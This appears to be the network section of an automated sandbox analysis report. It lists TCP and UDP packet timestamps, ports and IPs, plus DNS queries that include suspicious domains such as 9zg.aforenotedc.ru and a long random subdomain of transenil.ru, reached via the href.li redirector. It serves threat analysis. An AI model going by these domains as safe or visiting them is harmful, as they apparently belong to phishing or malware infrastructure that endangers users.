                                                                                  Oct 2, 2024 17:50:06.067863941 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.068989038 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.069053888 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:06.070466995 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:06.070550919 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.070667028 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:06.111402035 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.113434076 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:06.113440990 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.114216089 CEST44349782104.18.94.41192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.114387989 CEST44349782104.18.94.41192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.114489079 CEST49782443192.168.2.4104.18.94.41
                                                                                  Oct 2, 2024 17:50:06.115901947 CEST49782443192.168.2.4104.18.94.41
                                                                                  Oct 2, 2024 17:50:06.115917921 CEST44349782104.18.94.41192.168.2.4
                                                                                  Oct 2, 2024 17:50:06.153021097 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.027908087 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.028060913 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.028107882 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.028799057 CEST49783443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.028815985 CEST44349783188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.072514057 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.072540045 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.072606087 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.072798967 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.072804928 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.182944059 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.182979107 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.183059931 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.183279037 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.183290005 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.649418116 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.649743080 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.649772882 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.650753021 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.650811911 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.651529074 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.651588917 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.651681900 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.692174911 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.692543983 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.692569971 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.693610907 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.693669081 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.694812059 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.694873095 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.695000887 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.695008993 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.695400953 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.698105097 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.698127985 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.744956017 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.744975090 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:07.946980000 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.947074890 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.947412968 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.949642897 CEST49784443192.168.2.498.137.11.163
                                                                                  Oct 2, 2024 17:50:07.949664116 CEST4434978498.137.11.163192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.959630013 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:07.959687948 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.959831953 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:07.960288048 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:07.960314989 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.612358093 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.614037037 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:08.614077091 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.614542007 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.614761114 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:08.615148067 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.615205050 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:08.617501974 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:08.617501974 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:08.617589951 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.650774956 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.651175022 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.651343107 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:08.652930021 CEST49785443192.168.2.4188.114.97.3
                                                                                  Oct 2, 2024 17:50:08.652951956 CEST44349785188.114.97.3192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.666867018 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:08.666892052 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:08.714051008 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:09.271524906 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.271843910 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.271936893 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.271960020 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:09.271977901 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.272044897 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:09.272054911 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.289911032 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:09.289940119 CEST4434978687.248.119.252192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.290092945 CEST49786443192.168.2.487.248.119.252
                                                                                  Oct 2, 2024 17:50:09.295881987 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:09.295928001 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.296557903 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:09.297297955 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:09.297314882 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.308532000 CEST8049732217.20.57.24192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.308661938 CEST4973280192.168.2.4217.20.57.24
                                                                                  Oct 2, 2024 17:50:09.309668064 CEST4973280192.168.2.4217.20.57.24
                                                                                  Oct 2, 2024 17:50:09.314960957 CEST8049732217.20.57.24192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.070727110 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.070995092 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.071027994 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.071897984 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.071960926 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.071969986 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.072015047 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.073023081 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.073076010 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.073287964 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.073301077 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.073316097 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.119421005 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.120155096 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.363886118 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.364166021 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.364223003 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.364397049 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.364414930 CEST44349788188.125.72.139192.168.2.4
                                                                                  Oct 2, 2024 17:50:10.364427090 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:10.364463091 CEST49788443192.168.2.4188.125.72.139
                                                                                  Oct 2, 2024 17:50:11.716695070 CEST8049734217.20.57.24192.168.2.4
                                                                                  Oct 2, 2024 17:50:11.716763973 CEST4973480192.168.2.4217.20.57.24
                                                                                  Oct 2, 2024 17:50:11.716840029 CEST4973480192.168.2.4217.20.57.24
                                                                                  Oct 2, 2024 17:50:11.721813917 CEST8049734217.20.57.24192.168.2.4
                                                                                  Oct 2, 2024 17:50:12.908051014 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:12.908097982 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:12.908159971 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:12.908463955 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:12.908478022 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:13.631336927 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:13.631436110 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:13.762054920 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:13.762082100 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:13.763143063 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:13.807832003 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:13.905642033 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:13.947410107 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140577078 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140651941 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140675068 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140708923 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.140718937 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140769005 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140810966 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.140810966 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.140836954 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.140885115 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.142122984 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.142173052 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.142193079 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.142203093 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.142225027 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.143229961 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:14.143295050 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.165452003 CEST49789443192.168.2.413.85.23.86
                                                                                  Oct 2, 2024 17:50:14.165493011 CEST4434978913.85.23.86192.168.2.4
                                                                                  Oct 2, 2024 17:50:19.245625019 CEST4973380192.168.2.4192.229.221.95
                                                                                  Oct 2, 2024 17:50:19.251193047 CEST8049733192.229.221.95192.168.2.4
                                                                                  Oct 2, 2024 17:50:19.251245975 CEST4973380192.168.2.4192.229.221.95
                                                                                  Oct 2, 2024 17:50:38.592652082 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:38.592677116 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:38.592753887 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:38.592979908 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:38.592992067 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:39.246016026 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:39.246318102 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:39.246329069 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:39.247453928 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:39.247906923 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:39.248074055 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:39.294367075 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:49.151865005 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:49.151931047 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:50:49.151987076 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:49.546365023 CEST49791443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:50:49.546396017 CEST44349791142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:09.070586920 CEST44349730173.222.162.32192.168.2.4
                                                                                  Oct 2, 2024 17:51:09.070669889 CEST49730443192.168.2.4173.222.162.32
                                                                                  Oct 2, 2024 17:51:09.070804119 CEST44349730173.222.162.32192.168.2.4
                                                                                  Oct 2, 2024 17:51:09.070847034 CEST49730443192.168.2.4173.222.162.32
                                                                                  Oct 2, 2024 17:51:38.798691988 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:38.798743963 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:38.798919916 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:38.799309969 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:38.799324989 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:39.450191021 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:39.450587034 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:39.450618029 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:39.451353073 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:39.451793909 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:39.451858997 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:39.495140076 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:49.365950108 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:49.366013050 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:51:49.366179943 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:49.567147017 CEST49793443192.168.2.4142.250.184.196
                                                                                  Oct 2, 2024 17:51:49.567177057 CEST44349793142.250.184.196192.168.2.4
                                                                                  Oct 2, 2024 17:52:08.295792103 CEST8049731192.229.221.95192.168.2.4
                                                                                  Oct 2, 2024 17:52:08.296205044 CEST4973180192.168.2.4192.229.221.95
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 2, 2024 17:49:31.582552910 CEST138138192.168.2.4192.168.2.255
                                                                                  Oct 2, 2024 17:49:35.086317062 CEST53650551.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.100112915 CEST5528253192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:35.100275040 CEST5720353192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:35.106067896 CEST53612041.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.107383013 CEST53552821.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.107840061 CEST53572031.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.930032015 CEST53570161.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.960042953 CEST4942553192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:35.960180998 CEST5058653192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:35.967258930 CEST53494251.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:35.967302084 CEST53505861.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:36.108016014 CEST53511281.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:37.513712883 CEST5417053192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:37.513876915 CEST5336253192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:37.523093939 CEST53541701.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:37.530837059 CEST53533621.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:37.858198881 CEST53544421.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.510524988 CEST5708653192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:38.511169910 CEST5201753192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:38.539324045 CEST5072653192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:38.539489985 CEST6142453192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:38.546134949 CEST53507261.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.546180010 CEST53614241.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.667680025 CEST53520171.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:38.818161011 CEST53570861.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.585257053 CEST5684053192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:41.585511923 CEST4968653192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:41.586003065 CEST5061353192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:41.586307049 CEST5963253192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:41.586791992 CEST5417553192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:41.586987019 CEST5814153192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:41.592250109 CEST53568401.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.592623949 CEST53496861.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.593017101 CEST53506131.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.593027115 CEST53596321.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.593813896 CEST53581411.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:41.594119072 CEST53541751.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.706281900 CEST5729853192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:42.706425905 CEST6143753192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:42.713695049 CEST53614371.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:42.714196920 CEST53572981.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.398205042 CEST6431753192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:43.398387909 CEST5410353192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:49:43.405051947 CEST53643171.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:43.405461073 CEST53541031.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:47.191701889 CEST53552031.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:49:53.364626884 CEST53637571.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:05.470769882 CEST4941853192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:05.470972061 CEST5009753192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:05.566833973 CEST53494181.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:05.600708008 CEST53500971.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.055006981 CEST5606253192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:07.055140972 CEST5854753192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:07.058944941 CEST6283253192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:07.059087038 CEST5521553192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST53560621.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.072180033 CEST53585471.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.150028944 CEST53628321.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.183741093 CEST53552151.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.950879097 CEST5187253192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:07.951280117 CEST6083653192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:07.957856894 CEST53518721.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:07.958997965 CEST53608361.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.276443005 CEST5728453192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:09.276669979 CEST5387053192.168.2.41.1.1.1
                                                                                  Oct 2, 2024 17:50:09.283904076 CEST53572841.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:09.286056995 CEST53538701.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:12.253442049 CEST53569301.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:34.071400881 CEST53536731.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:50:34.790656090 CEST53601241.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:51:02.831897020 CEST53580531.1.1.1192.168.2.4
                                                                                  Oct 2, 2024 17:51:47.277514935 CEST53550531.1.1.1192.168.2.4
                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                  Oct 2, 2024 17:50:05.600820065 CEST192.168.2.41.1.1.1c2b1(Port unreachable)Destination Unreachable
                                                                                  Oct 2, 2024 17:50:07.183796883 CEST192.168.2.41.1.1.1c2b1(Port unreachable)Destination Unreachable
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 2, 2024 17:49:35.100112915 CEST192.168.2.41.1.1.10x41eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.100275040 CEST192.168.2.41.1.1.10xdce8Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.960042953 CEST192.168.2.41.1.1.10xe530Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.960180998 CEST192.168.2.41.1.1.10x9266Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:37.513712883 CEST192.168.2.41.1.1.10xfed8Standard query (0)href.liA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:37.513876915 CEST192.168.2.41.1.1.10x4bc6Standard query (0)href.li65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.510524988 CEST192.168.2.41.1.1.10x9af4Standard query (0)9zg.aforenotedc.ruA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.511169910 CEST192.168.2.41.1.1.10x6e5cStandard query (0)9zg.aforenotedc.ru65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.539324045 CEST192.168.2.41.1.1.10x98f8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.539489985 CEST192.168.2.41.1.1.10xf86Standard query (0)www.google.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.585257053 CEST192.168.2.41.1.1.10x84e3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.585511923 CEST192.168.2.41.1.1.10x7ea3Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.586003065 CEST192.168.2.41.1.1.10x110Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.586307049 CEST192.168.2.41.1.1.10xba84Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.586791992 CEST192.168.2.41.1.1.10xd4a9Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.586987019 CEST192.168.2.41.1.1.10x2d4eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:42.706281900 CEST192.168.2.41.1.1.10x4313Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:42.706425905 CEST192.168.2.41.1.1.10xa41bStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:43.398205042 CEST192.168.2.41.1.1.10xfba2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:43.398387909 CEST192.168.2.41.1.1.10x93deStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:05.470769882 CEST192.168.2.41.1.1.10x6640Standard query (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ruA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:05.470972061 CEST192.168.2.41.1.1.10x1f46Standard query (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.055006981 CEST192.168.2.41.1.1.10xdc6fStandard query (0)yahoo.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.055140972 CEST192.168.2.41.1.1.10xa263Standard query (0)yahoo.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.058944941 CEST192.168.2.41.1.1.10x20a6Standard query (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ruA (IP address)IN (0x0001)false
